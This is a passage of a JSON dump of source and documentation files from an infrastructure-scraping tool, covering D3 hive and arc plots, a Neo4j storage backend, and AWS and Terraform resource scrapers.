d3.select(selector),\n targetHeight=height,\n targetWidth=width,\n targetRadius=radius;\n if(width === \"auto\"){\n targetWidth = container.node().clientWidth;\n }\n if(height === \"auto\"){\n targetHeight = container.node().clientHeight;\n }\n if(radius === \"auto\"){\n targetRadius= Math.min(targetWidth, targetHeight) * 0.4;\n }\n container.html(\"\");\n var plotFunctions = {\n createAxes: function(items) {\n return items.map(function(item, index) {\n item.icon.color = d3.schemeCategory20[index];\n iconMapping[item.kind] = item.icon;\n itemCounters[item.kind] = 0;\n axisMapping[item.kind] = item.x;\n itemStep[item.kind] = 1 / item.items;\n radiusMapping[item.kind] = d3.scaleLinear()\n .range([item.innerRadius*targetRadius, item.outerRadius*targetRadius]);\n return item;\n });\n },\n createNodes: function(items) {\n return items.map(function(item) {\n item[\"x\"] = axisMapping[item.kind];\n itemCounters[item.kind]++;\n item[\"y\"] = itemCounters[item.kind];\n return item;\n });\n },\n createLinks: function(nodes, relations) {\n return relations.map(function(link) {\n var retLink = {};\n nodes.forEach(function(node) {\n if (link.source == node.id) {\n retLink.source = node;\n } else if (link.target == node.id) {\n retLink.target = node;\n }\n });\n if (!retLink.hasOwnProperty(\"source\") || !retLink.hasOwnProperty(\"target\")) {\n console.log(\"Can not find relation node for link \" + link);\n retLink = link;\n }\n return retLink;\n });\n }\n };\n\n if (typeof data.axes === 'object') {\n data.axes = Object.values(data.axes);\n }\n\n if (typeof data.resources === 'object') {\n data.resources = Object.values(data.resources);\n }\n\n var axes = plotFunctions.createAxes(data.axes);\n var nodes = plotFunctions.createNodes(data.resources);\n var links = plotFunctions.createLinks(nodes, data.relations);\n\n console.log(nodes);\n\n var angle = function(d) {\n var angle = 0,\n found = false;\n axes.forEach(function(item) {\n if (d.kind == item.kind) {\n angle = item.angle;\n found = true;\n }\n });\n if (!found) {\n console.log(\"Cannot compute angle for \" + d.kind + \" \" + d.name)\n }\n return angle;\n }\n\n var svg = container\n .append(\"svg\")\n .attr(\"width\", targetWidth)\n .attr(\"preserveAspectRatio\",\"xMidYMid meet\")\n .attr(\"height\", targetHeight)\n .append(\"g\")\n .attr(\"transform\", \"translate(\" + (targetWidth / 2) + \",\" + (targetHeight / 2) + \")\");\n\n var mouseFunctions = {\n linkOver: function(d) {\n svg.selectAll(\".link\").classed(\"active\", function(p) {\n return p === d;\n });\n svg.selectAll(\".node circle\").classed(\"active\", function(p) {\n return p === d.source || p === d.target;\n });\n svg.selectAll(\".node text\").classed(\"active\", function(p) {\n return p === d.source || p === d.target;\n });\n },\n nodeOver: function(d) {\n var $elem = d3.select(this);\n svg.selectAll(\".link\").classed(\"active\", function(p) {\n return p.source === d || p.target === d;\n });\n svg.selectAll(\".link.active\").each(function(link){\n svg.selectAll(\".node.node-\"+getNodeCode(link.target)+\", .node.node-\"+getNodeCode(link.source))\n .classed(\"active\",true);\n });\n $elem.classed(\"active\") || $elem.classed(\"active\",true);\n tooltip.html(\"Node - \" + d.name + \"<br/>\" + \"Kind - \" + d.kind)\n .style(\"left\", (d3.event.pageX + 5) + \"px\")\n .style(\"top\", (d3.event.pageY - 28) + \"px\");\n tooltip.transition()\n .duration(200)\n .style(\"opacity\", .9);\n },\n out: function(d) {\n svg.selectAll(\".active\").classed(\"active\", false);\n tooltip.transition()\n .duration(500)\n .style(\"opacity\", 0);\n }\n };\n\n var tooltip = d3.select(\"#HiveChartTooltip\");\n // tooltip is d3 selection\n if(tooltip.empty()){\n tooltip = d3.select(\"body\").append(\"div\")\n .attr(\"id\", \"HiveChartTooltip\")\n .attr(\"class\", \"tooltip\")\n .style(\"opacity\", 0);\n }\n\n // Plot render\n var axe = svg.selectAll(\".node\").data(axes)\n .enter().append(\"g\");\n\n axe.append(\"line\")\n .attr(\"class\", \"axis\")\n .attr(\"transform\", function(d) {\n return \"rotate(\" + d.angle + \")\";\n })\n .attr(\"x1\", function(d) {\n return radiusMapping[d.kind].range()[0]\n })\n .attr(\"x2\", function(d) {\n return radiusMapping[d.kind].range()[1]\n });\n\n axe.append(\"text\")\n .attr(\"class\", \"axis-label\")\n .attr('font-size', '16px')\n .attr('font-family', 'Open Sans')\n .attr('text-anchor', 'middle')\n .attr('alignment-baseline', 'central')\n .text(function(d) {\n return d.name;\n })\n .attr(\"transform\", function(d) {\n var x = (radiusMapping[d.kind].range()[1] + 30) * Math.cos(Math.radians(d.angle));\n var y = (radiusMapping[d.kind].range()[1] + 30) * Math.sin(Math.radians(d.angle));\n return \"translate(\" + x + \", \" + y + \")\";\n });\n\n svg.selectAll(\".link\").data(links)\n .enter().append(\"path\")\n .attr(\"class\", \"link\")\n .attr(\"d\", d3.hive.link()\n .angle(function(d) {\n return Math.radians(angle(d));\n })\n .radius(function(d) {\n return radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1);\n }))\n .on(\"mouseover\", mouseFunctions.linkOver)\n .on(\"mouseout\", mouseFunctions.out);\n\n var node = svg.selectAll(\".node\").data(nodes)\n .enter().append(\"g\")\n .attr(\"class\",function(d){\n return \"node node-\"+getNodeCode(d);\n })\n .attr(\"transform\", function(d) {\n var x = radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1) * Math.cos(Math.radians(angle(d)));\n var y = radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1) * Math.sin(Math.radians(angle(d)));\n return \"translate(\" + x + \", \" + y + \")\";\n });\n\n node.append(\"circle\")\n .attr(\"r\", 16)\n\n node.append(\"text\")\n .attr('fill', function(d) { return iconFunctions.color(d.kind); })\n .attr('font-size', function(d) { return iconFunctions.size(d.kind); })\n .attr('font-family', function(d) { return iconFunctions.family(d.kind); })\n .text(function(d) { return iconFunctions.character(d.kind); })\n .attr(\"transform\", function(d) { return iconFunctions.transform(d.kind); });\n\n node.on(\"mouseover\", mouseFunctions.nodeOver)\n .on(\"mouseout\", mouseFunctions.out);\n\n node.on(\"click\", function(node){\n svg.selectAll(\".node\").classed(\"selected\", function(d) { return d === node; });\n svg.selectAll(\".link\").classed(\"selected\", function(p) {\n return p.source === node || p.target === node;\n });\n if(config.hasOwnProperty(\"nodeClickFn\") && typeof config.nodeClickFn === 'function'){\n config.nodeClickFn(node);\n }\n });\n }\n render();\n window.removeEventListener('resize', render);\n window.addEventListener('resize', render);\n }\n};" }, { "alpha_fraction": 0.6171082854270935, "alphanum_fraction": 0.6178196668624878, "avg_line_length": 36.731544494628906, "blob_id": "0775476ce4202ccc2e435734ecd1267d8657ab89", "content_id": "42d2b6e9bd583be5ea625186a967836137aa3520", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5623, "license_type": "permissive", "max_line_length": 108, "num_lines": 149, "path": "/infra_scraper/storage/neo4j.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport glob\nimport yaml\nimport logging\n\nfrom infra_scraper.utils import to_camel_case, ClassRegistry\n\nfrom neomodel import config, StructuredNode, StringProperty, IntegerProperty, JSONProperty\nfrom neomodel.match import OUTGOING, INCOMING, EITHER\nfrom neomodel.relationship_manager import RelationshipManager\nfrom neomodel.relationship import StructuredRel\n\n\nlogger = logging.getLogger(__name__)\n\nregistry = ClassRegistry()\n\n\nclass ResourceRel(StructuredRel):\n size = IntegerProperty(default=1)\n status = StringProperty(default='unknown')\n\n\nclass RelationshipDefinition(object):\n def __init__(self, relation_type, cls_name, direction, manager=RelationshipManager, model=None):\n self._raw_class = cls_name\n self.manager = manager\n self.definition = {}\n self.definition['relation_type'] = relation_type\n self.definition['direction'] = direction\n self.definition['model'] = model\n\n def _lookup_node_class(self):\n if not isinstance(self._raw_class, str):\n self.definition['node_class'] = self._raw_class\n else:\n name = self._raw_class\n self.definition['node_class'] = registry.get_type(name)\n\n def build_manager(self, source, name):\n self._lookup_node_class()\n return self.manager(source, name, self.definition)\n\n\nclass ZeroOrMore(RelationshipManager):\n \"\"\"\n A relationship of zero or more nodes (the default)\n \"\"\"\n description = \"zero or more relationships\"\n\n\ndef _relate(cls_name, direction, rel_type, cardinality=None, model=None):\n\n if model and not issubclass(model, (StructuredRel,)):\n raise ValueError('model must be a StructuredRel')\n return RelationshipDefinition(rel_type, cls_name, direction, cardinality, model)\n\n\ndef RelationshipTo(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, OUTGOING, rel_type, cardinality, model)\n\n\ndef RelationshipFrom(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, INCOMING, rel_type, cardinality, model)\n\n\ndef Relationship(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, EITHER, rel_type, cardinality, model)\n\n\nclass Neo4jStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(Neo4jStorage, self).__init__(**kwargs)\n config.DATABASE_URL = kwargs['database_url']\n\n def convert_relations(self, relation_types):\n for relation_name, relation in relation_types.items():\n registry.add(type(\n relation_name,\n (ResourceRel,),\n relation.get('model', {})))\n\n def convert_resources(self, resource_types):\n for resource_name, resource in resource_types.items():\n fields = {\n 'uid': StringProperty(unique_index=True),\n 'name': StringProperty(required=True),\n 'kind': StringProperty(required=True),\n 'metadata': JSONProperty(required=True),\n }\n for field_name, field in resource.get('model', {}).items():\n cls_name = field.pop(\"type\")\n target_cls = field.pop('target')\n model_name = field.pop('model')\n field['model'] = registry.get_type(model_name)\n fields[field_name] = globals().get(to_camel_case(cls_name))(target_cls, model_name, **field)\n registry.add(type(resource_name,\n (StructuredNode,), fields))\n\n def _get_last_timestamp(self, name):\n sinks = glob.glob('{}/*.yaml'.format(self._get_storage_dir(name)))\n last_sink = max(sinks, key=os.path.getctime)\n return last_sink.split('/')[-1].replace('.yaml', '')\n\n def save_data(self, name, data):\n self.convert_relations(data['relation_types'])\n self.convert_resources(data['resource_types'])\n\n resources = {}\n\n for resource_type_name, resource_type in data['resources'].items():\n cls = registry.get_type(resource_type_name)\n for resource_name, resource in resource_type.items():\n # import pdb; pdb.set_trace()\n resources[resource['uid']] = cls(**resource).save()\n for relation_type_name, relation_type in data['relations'].items():\n for relation in relation_type:\n if relation['source'] in resources and relation['target'] in resources:\n source = resources[relation['source']]\n target = resources[relation['target']]\n try:\n rel_field = data['relation_types'][relation_type_name]['relation'][source.kind]\n except:\n rel_field = data['relation_types'][relation_type_name]['relation']['default']\n relation = getattr(source, rel_field).build_manager(source, relation_type_name)\n relation.connect(target, {})\n\n self.last_timestamp = data['timestamp']\n\n def load_data(self, name):\n data = None\n self.last_timestamp = self._get_last_timestamp(name)\n filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n self.last_timestamp)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError as exception:\n logger.error(exception)\n stream.close()\n return data\n\n def save_output_data(self, name, kind, data):\n pass\n\n def load_output_data(self, name, kind):\n pass\n" }, { "alpha_fraction": 0.7050632834434509, "alphanum_fraction": 0.7139240503311157, "avg_line_length": 27.214284896850586, "blob_id": "25d52c9d5e399e33b04b401f59438e58d664d36c", "content_id": "3ea582641afd6a2ccc3e9ae9ca43c53510e38bb0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 794, "license_type": "permissive", "max_line_length": 77, "num_lines": 28, "path": "/doc/source/text/layout-hive.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=========\nHive Plot\n=========\n\nThe `hive plot` is a visualization method for drawing networks. Nodes\nare mapped to and positioned on radially distributed linear axes — this\nmapping is based on network structural properties. Edges are drawn as curved\nlinks. Simple and interpretable.\n\nThe purpose of the hive plot is to establish a new baseline for visualization\nof large networks — a method that is both general and tunable and useful as a\nstarting point in visually exploring network structure.\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/hive-plot.png\n :width: 100%\n :figclass: align-center\n\n Hive plot of all OpenStack resources (cca 3000 nodes)\n\n\nMore Information\n================\n\n* http://mkweb.bcgsc.ca/linnet/\n* https://bost.ocks.org/mike/hive/" }, { "alpha_fraction": 0.499827116727829, "alphanum_fraction": 0.5081258416175842, "avg_line_length": 41.844444274902344, "blob_id": "1aa83421f26f7eae9a3bb2b88446696bd767900b", "content_id": "a93746dc8165f302d3d38efbafd82b68c87980d3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5784, "license_type": "permissive", "max_line_length": 95, "num_lines": 135, "path": "/infra_scraper/input/amazon.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport boto3\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.aws')\n\n\nclass AmazonWebServicesInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'aws'\n self.scope = kwargs.get('scope', 'local')\n super(AmazonWebServicesInput, self).__init__(**kwargs)\n self.ec2_client = boto3.resource('ec2')\n self.s3_client = boto3.resource('s3')\n\n def scrape_all_resources(self):\n# self.scrape_ec2_images()\n# self.scrape_ec2_elastic_ips()\n self.scrape_ec2_instances()\n self.scrape_ec2_internet_gateways()\n self.scrape_ec2_subnets()\n self.scrape_ec2_vpcs()\n self.scrape_ec2_key_pairs()\n self.scrape_s3_buckets()\n\n def _create_relations(self):\n for resource_id, resource in self.resources.get('ec2_instance', {}).items():\n if 'VpcId' in resource['metadata']:\n if resource['metadata']['VpcId'] in self.resources.get('ec2_vpc', {}):\n self._scrape_relation(\n 'in_ec2_vpc',\n resource_id,\n resource['metadata']['VpcId'])\n\n if 'KeyName' in resource['metadata']:\n if resource['metadata']['KeyName'] in self.resources.get('ec2_key_pair', {}):\n self._scrape_relation(\n 'using_ec2_key_pair',\n resource_id,\n resource['metadata']['KeyName'])\n\n if 'SubnetId' in resource['metadata']:\n if resource['metadata']['SubnetId'] in self.resources.get('ec2_subnet', {}):\n self._scrape_relation(\n 'in_ec2_subnet',\n resource_id,\n resource['metadata']['SubnetId'])\n\n def scrape_ec2_elastic_ips(self):\n for item in self.ec2_client.eips.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['InternetGatewayId'],\n resource['data']['InternetGatewayId'],\n 'ec2_internet_gateway', None, metadata=resource['data'])\n\n def scrape_ec2_images(self):\n for item in self.ec2_client.images.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n if 'Name' in resource['data']:\n image_name = resource['data']['Name']\n else:\n image_name = resource['data']['ImageId']\n self._scrape_resource(resource['data']['ImageId'],\n image_name,\n 'ec2_image', None, metadata=resource['data'])\n\n def scrape_ec2_instances(self):\n for item in self.ec2_client.instances.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n try:\n name = resource['data']['NetworkInterfaces'][0]['Association']['PublicDnsName']\n except Exception:\n name = resource['data']['InstanceId']\n print(resource['data'])\n self._scrape_resource(resource['data']['InstanceId'],\n name,\n 'ec2_instance', None, metadata=resource['data'])\n\n def scrape_ec2_internet_gateways(self):\n for item in self.ec2_client.internet_gateways.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['InternetGatewayId'],\n resource['data']['InternetGatewayId'],\n 'ec2_internet_gateway', None, metadata=resource['data'])\n\n def scrape_ec2_key_pairs(self):\n for item in self.ec2_client.key_pairs.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['KeyName'],\n resource['data']['KeyName'],\n 'ec2_key_pair', None, metadata=resource['data'])\n\n def scrape_ec2_subnets(self):\n for item in self.ec2_client.subnets.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['SubnetId'],\n resource['data']['SubnetId'],\n 'ec2_subnet', None, metadata=resource['data'])\n\n def scrape_ec2_vpcs(self):\n for item in self.ec2_client.vpcs.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n name = resource['data']['VpcId']\n for tag in resource['data'].get('Tags', {}):\n if tag['Key'] == 'Name':\n name = tag['Value']\n self._scrape_resource(resource['data']['VpcId'],\n name,\n 'ec2_vpc', None, metadata=resource['data'])\n\n def scrape_s3_buckets(self):\n for item in self.s3_client.buckets.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['Name'],\n resource['data']['Name'],\n 's3_bucket', None, metadata=resource['data'])\n" }, { "alpha_fraction": 0.4569922983646393, "alphanum_fraction": 0.4656792879104614, "avg_line_length": 38.67231750488281, "blob_id": "7a53d0228b0a6c55e064dac314b4ef59bf132a9a", "content_id": "9d148f076fc25a6fac3c827ebc4a8e049eac9ca4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7022, "license_type": "permissive", "max_line_length": 132, "num_lines": 177, "path": "/infra_scraper/assets/static/js/d3.plot.arc.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "var RelationalPlot = function(RelationalPlot){\n /**\n * Arc diagram rendering method\n * @param dataUrl - Data endpoint URL\n * @param graphSelector - Graph parent <div> CSS selector\n * @param refreshInterval - Refresh interval in seconds (null for disabled)\n */\n RelationalPlot.arc = function(dataUrl, graphSelector, refreshInterval) {\n\n var nodeCount;\n var nodeRadius = d3.scaleSqrt().range([3, 7]);\n var linkWidth = d3.scaleLinear().range([1.5, 2 * nodeRadius.range()[0]]);\n\n var margin = { top: 0, right: 18, bottom: 18, left: 18 };\n\n var width = $(graphSelector).innerWidth() - margin.left - margin.right;\n var height = $(graphSelector).innerWidth() * 2/3 - margin.top - margin.bottom;\n\n var x = d3.scaleLinear().range([0, width]);\n\n var graph = this;\n\n this._data = {};\n\n this.init = function(alreadyRunning) {\n if(alreadyRunning && graph.svg) {\n graph.svg.remove()\n }\n\n graph.svg = d3.select(graphSelector).append(\"svg\")\n .attr('width', width + margin.left + margin.right)\n .attr('height', height + margin.top + margin.bottom)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\n if(!alreadyRunning){\n graph.requestData(dataUrl, graph.render);\n $(window).on('resize', function(ev){\n graph.init(true);\n graph.render();\n });\n\n if(refreshInterval){\n setInterval(function(){\n graph.requestData(dataUrl, function(){\n graph.init(true);\n graph.render();\n });\n }, refreshInterval * 1000);\n }\n }\n };\n\n this.createNodes = function(items) {\n var output = [];\n var index = 0;\n for (var key in items) {\n item = items[key];\n item[\"x\"] = index / nodeCount * width;\n item[\"y\"] = height;\n index += 1;\n output.push(item);\n }\n return output;\n };\n\n this.createAxes = function(items) {\n items.map(function(item, index) {\n item.icon.color = d3.schemeCategory20[index];\n iconMapping[item.kind] = item.icon;\n });\n };\n\n this.createLinks = function(nodes, relations) {\n return relations.map(function(link) {\n var retLink = {};\n nodes.forEach(function(node) {\n if (link.source == node.id) {\n retLink.source = node;\n } else if (link.target == node.id) {\n retLink.target = node;\n }\n });\n if (!retLink.hasOwnProperty(\"source\") || !retLink.hasOwnProperty(\"target\")) {\n console.log(\"Can not find relation node for link \" + link);\n retLink = link;\n }\n return retLink;\n });\n }\n\n this.render = function() {\n\n nodeCount = Object.keys(graph._data.resources).length;\n nodes = graph.createNodes(graph._data.resources);\n graph.createAxes(Object.values(graph._data.axes));\n links = graph.createLinks(nodes, graph._data.relations);\n\n nodeRadius.domain(d3.extent(nodes, function (d) { return 18 }));\n linkWidth.domain(d3.extent(links, function (d) { return 1 }));\n\n var link = graph.svg.append('g')\n .attr('class', 'links')\n .selectAll('path')\n .data(links)\n .enter().append('path')\n .attr('d', function (d) {\n return ['M', d.source.x, height, 'A',\n (d.source.x - d.target.x)/2, ',',\n (d.source.x - d.target.x)/2, 0, 0, ',',\n d.source.x < d.target.x ? 1 : 0, d.target.x, ',', height]\n .join(' ');\n })\n .attr('stroke-width', function (d) { return 2; })\n .on('mouseover', function (d) {\n link.style('stroke', null);\n d3.select(this).style('stroke', '#d62333');\n// node.style('fill', function (node_d) {\n// return node_d === d.source || node_d === d.target ? 'black' : null;\n// });\n })\n .on('mouseout', function (d) {\n link.style('stroke', null);\n// node.style('fill', null);\n });\n\n var node = graph.svg.append('g')\n .attr('class', 'nodes')\n .selectAll('circle')\n .data(nodes)\n .enter().append('g')\n .attr(\"transform\", function(d){\n return \"translate(\" + d.x + \", \" + d.y + \")\"\n });\n\n node.append('circle')\n .attr('r', function (d) { return 16; })\n .on('mouseover', function (d) {\n// node.style('fill', null);\n// d3.select(this).style('fill', 'black');\n var nodesToHighlight = links.map(function (e) { return e.source === d ? e.target : e.target === d ? e.source : 0})\n .filter(function (d) { return d; });\n// node.filter(function (d) { return nodesToHighlight.indexOf(d) >= 0; })\n// .style('fill', '#555');\n link.style('stroke', function (link_d) {\n return link_d.source === d | link_d.target === d ? '#d62333' : null;\n });\n })\n .on('mouseout', function (d) {\n node.style('fill', null);\n link.style('stroke', null);\n });\n\n node.append(\"text\")\n .attr('fill', function(d) { return iconFunctions.color(d.kind); })\n .attr('font-size', function(d) { return iconFunctions.size(d.kind); })\n .attr('font-family', function(d) { return iconFunctions.family(d.kind); })\n .text(function(d) { return iconFunctions.character(d.kind); })\n .attr(\"transform\", function(d) { return iconFunctions.transform(d.kind); })\n \n };\n\n this.requestData = function(dataUrl, callback){\n d3.json(dataUrl, function(res){\n graph._data = res;\n relationalPlotHelpers.displayResources(Object.keys(graph._data.resources).length);\n relationalPlotHelpers.displayRelations(graph._data.relations.length);\n relationalPlotHelpers.displayScrapeTime(res.date);\n if(typeof callback === 'function'){\n callback();\n }\n });\n };\n\n };\n return RelationalPlot;\n}(RelationalPlot || {});\n" }, { "alpha_fraction": 0.6180555820465088, "alphanum_fraction": 0.6180555820465088, "avg_line_length": 26.380952835083008, "blob_id": "aaf5a3c4ea12acf0c1e59545cc8c64d4d0a6c215", "content_id": "65831bdb60faef4ecec8acfb64d239e6a28b8886", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "permissive", "max_line_length": 74, "num_lines": 21, "path": "/infra_scraper/output/raw.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\nfrom .base import BaseOutput\n\nlogger = logging.getLogger(__name__)\n\n\nclass RawOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(RawOutput, self).__init__(**kwargs)\n\n def transform_data(self, data):\n resources = {}\n\n for resource_name, resource_data in data['resources'].items():\n resources[resource_name] = []\n for resource_id, resource_item in resource_data.items():\n resources[resource_name].append(resource_item['metadata'])\n\n data['resources'] = resources\n return data\n" }, { "alpha_fraction": 0.8591065406799316, "alphanum_fraction": 0.8625429272651672, "avg_line_length": 13.600000381469727, "blob_id": "f78432bbae5c7fbead4817d0c667a728858f8b95", "content_id": "b95d702e71c0664627871d6a2d85f732087af325", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 291, "license_type": "permissive", "max_line_length": 46, "num_lines": 20, "path": "/requirements.txt", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "pyyaml\nmsgpack-python\nFlask\nClick\nos_client_config\npython-cinderclient\npython-glanceclient\npython-heatclient\npython-keystoneclient\npython-novaclient\npython-neutronclient\npykube\nboto3\ntosca-parser\nsalt-pepper\npython-terraform\npydot\ngraphviz\njuju\ngit+https://github.com/maas/python-libmaas.git" }, { "alpha_fraction": 0.6137565970420837, "alphanum_fraction": 0.6137565970420837, "avg_line_length": 22.375, "blob_id": "28ed523594df76a7499c9da0c58fa59eca12bc4e", "content_id": "fe49f4028f82b3111225f277a768391ff407891a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 189, "license_type": "permissive", "max_line_length": 58, "num_lines": 8, "path": "/doc/source/text/input-terraform.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nTerraForm Templates\n===================\n\nConfiguration for parsing terraform templates.\n\n.. literalinclude:: ../static/config/config-terraform.yaml\n :language: yaml\n\n" }, { "alpha_fraction": 0.5490638613700867, "alphanum_fraction": 0.5574103593826294, "avg_line_length": 46.66666793823242, "blob_id": "434419908e433d9f533e9e17a9cb4757ad662dd6", "content_id": "b058c7e56edf422c2d68afe73ce248087e1ab407", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4433, "license_type": "permissive", "max_line_length": 114, "num_lines": 93, "path": "/infra_scraper/input/terraform.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport io\nimport python_terraform\nfrom pydot import graph_from_dot_data\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.terraform')\n\nrelation_mapping = {\n 'tf_openstack_compute_instance_v2-tf_openstack_compute_keypair_v2': 'using_tf_key_pair',\n 'tf_openstack_networking_subnet_v2-tf_openstack_networking_network_v2': 'in_tf_net',\n 'tf_openstack_compute_floatingip_associate_v2-tf_openstack_networking_floatingip_v2': 'links_tf_floating_ip',\n 'tf_openstack_networking_floatingip_v2-tf_openstack_networking_router_interface_v2': 'links_tf_floating_ip',\n 'tf_openstack_networking_router_interface_v2-tf_openstack_networking_subnet_v2': 'in_tf_subnet',\n 'tf_openstack_networking_router_interface_v2-tf_openstack_networking_router_v2': 'links_tf_router',\n 'tf_openstack_compute_instance_v2-tf_openstack_networking_network_v2': 'in_tf_net',\n 'tf_openstack_compute_floatingip_associate_v2-tf_openstack_compute_instance_v2': 'links_tf_floating_instance',\n 'tf_openstack_compute_instance_v2-tf_openstack_compute_secgroup_v2': 'has_tf_security_group',\n}\n\nclass TerraformInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'terraform'\n super(TerraformInput, self).__init__(**kwargs)\n self.client = python_terraform.Terraform(\n working_dir=self.config['dir'])\n\n def scrape_all_resources(self):\n self.scrape_resources()\n\n def clean_name(self, name):\n return name.replace('\"', '').replace('[root] ', '').strip()\n\n def _create_relations(self):\n return_code, raw_data, stderr = self.client.graph(\n no_color=python_terraform.IsFlagged)\n graph = graph_from_dot_data(raw_data)[0]\n for edge in graph.obj_dict['subgraphs']['\"root\"'][0]['edges']:\n source = self.clean_name(edge[0]).split('.')\n target = self.clean_name(edge[1]).split('.')\n if 'tf_{}'.format(source[0]) in self.resources and 'tf_{}'.format(target[0]) in self.resources:\n self._scrape_relation(\n relation_mapping['tf_{}-tf_{}'.format(source[0], target[0])],\n '{}.{}'.format(source[0], source[1]),\n '{}.{}'.format(target[0], target[1]))\n\n def scrape_resources(self):\n return_code, raw_data, stderr = self.client.graph(\n no_color=python_terraform.IsFlagged)\n graph = graph_from_dot_data(raw_data)[0]\n nodes = {}\n for node in graph.obj_dict['subgraphs']['\"root\"'][0]['nodes']:\n clean_node = 'tf_{}'.format(self.clean_name(node).split('.')[0])\n if clean_node in self._schema['resource']:\n nodes[self.clean_name(node)] = {\n 'id': self.clean_name(node),\n 'name': self.clean_name(node).split('.')[1],\n 'kind': 'tf_{}'.format(self.clean_name(node).split('.')[0]),\n 'metadata': {}\n }\n res = None\n return_code, raw_data, stderr = self.client.show(\n no_color=python_terraform.IsFlagged)\n raw_data = raw_data.split('Outputs:')[0]\n data_buffer = io.StringIO(raw_data)\n for line in data_buffer.readlines():\n if line.strip() == '':\n pass\n elif line.startswith(' '):\n meta_key, meta_value = line.split(' = ')\n res['metadata'][meta_key.strip()] = meta_value.strip()\n else:\n if res is not None:\n nodes[res['id']]['metadata'] = res['metadata']\n resource_id = line.replace(' (tainted', '') \\\n .replace(':', '').replace('(', '').replace(')', '').strip()\n try:\n resource_kind, resource_name = str(resource_id).split('.')\n res = {\n 'id': resource_id,\n 'name': resource_name.strip(),\n 'kind': 'tf_{}'.format(resource_kind),\n 'metadata': {}\n }\n except Exception as exception:\n logger.error(exception)\n for node_name, node in nodes.items():\n self._scrape_resource(node['id'], node['name'],\n node['kind'], None,\n metadata=node['metadata'])\n" }, { "alpha_fraction": 0.29487180709838867, "alphanum_fraction": 0.29487180709838867, "avg_line_length": 24, "blob_id": "baa21a08340245d105636bdd959096aab0b80fa2", "content_id": "f8a2f521c53beff92a3339a3d28853ee69095ec9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/doc/source/text/app-architecture.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n========================\nApplication Architecture\n========================\n\n\n" }, { "alpha_fraction": 0.7306700944900513, "alphanum_fraction": 0.7532216310501099, "avg_line_length": 37.79999923706055, "blob_id": "0104b36b7bd27911499acb2809fd17e9c1d4aba6", "content_id": "6f2e723e22fa84d78da1dfec6d625ac0b376f148", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1552, "license_type": "permissive", "max_line_length": 78, "num_lines": 40, "path": "/doc/source/text/layout-arc.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===========\nArc Diagram\n===========\n\nAn arc diagram is a style of graph drawing, in which the vertices of a graph\nare placed along a line in the Euclidean plane, with edges being drawn as\nsemicircles in one of the two halfplanes bounded by the line, or as smooth\ncurves formed by sequences of semicircles. In some cases, line segments of the\nline itself are also allowed as edges, as long as they connect only vertices\nthat are consecutive along the line.\n\nThe use of the phrase \"arc 